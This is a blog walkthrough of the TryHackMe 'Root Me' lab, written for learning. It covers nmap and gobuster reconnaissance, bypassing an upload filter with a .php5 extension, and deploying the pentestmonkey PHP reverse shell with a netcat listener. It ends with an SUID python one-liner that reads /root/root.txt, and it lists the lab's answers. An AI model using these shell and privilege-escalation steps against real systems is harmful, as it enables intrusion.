Root Me | TryHackMe Writeup. Let’s hack | by Anas Ibrahim | Medium

Root Me | TryHackMe Writeup
Anas Ibrahim
·Follow
4 min read·
Jul 29, 2022
--
Let’s hack
Task1 : Deploy the machine
Connect to tryhackme vpn
1- click to OpenVPN
2- download VPN file
3- run the file (sudo openvpn file.ovpn)
connected successfullyTask2 : Reconnaissance
Nmap Scan:
nmap -sV <Machine IP>
-sV : Version detection
There are 2 ports open : 
22/ssh — OpenSSH 7.6p1 
80/http — Apache httpd 2.4.29
#1.1- Scan the machine , how many ports are open ?
2
#1.2- What version of Apache is running?
2.4.29
#1.3- What service is running on port 22?
SSH
next step : fuzzing directories using Gobuster tool
gobuster dir -w <Path_To_Wordlist> -u http://<Machine_IP>
w : wordlist
-u : url
#1.4- Find directories on the web server using the GoBuster tool.
No answer needed
#1.5- What is the hidden directory?
/panel/
Task3 : Getting a shell
navigate to url http://<Machine_IP>
it’s not an important page
check the panel directory
includes file upload vulnerability , try to upload file with php extension
php extension not permitted
try to upload file with php5 extension
php5 is permitted
so , search for php reverse shell pentester monkey on github
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
open the file and change the ip to your attacker ip and the listener port on your machine
try to upload the file and check the uploads directory
click to shell.php5 and listen with your port ( nc -nv 4444 )
we got a shell
i need the user flag , so i can search on terminal about user.txt by following command
find / -type f -name user.txt
/ : root directory
type f : file
-name : file name
user.txt exists on /var/www
Task5 : Privilege escalation
Search for files with SUID permission, which file is weird?
/usr/bin/python
With the find command we can look at the binary file who have SUID, and /usr/bin/python is an interesting file.
2.Find a form to escalate your privileges.
Just click Completed
Because I just need to read root.txt, so I use File read command from gtfobins.
So, to read root.txt file write this command
python -c ‘print(open(“/root/root.txt”).read())’
Machine hacked done ..
--
--
Written by Anas Ibrahim266 Followers
·49 Following
Cyber Security Engineer
No responses yet
Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams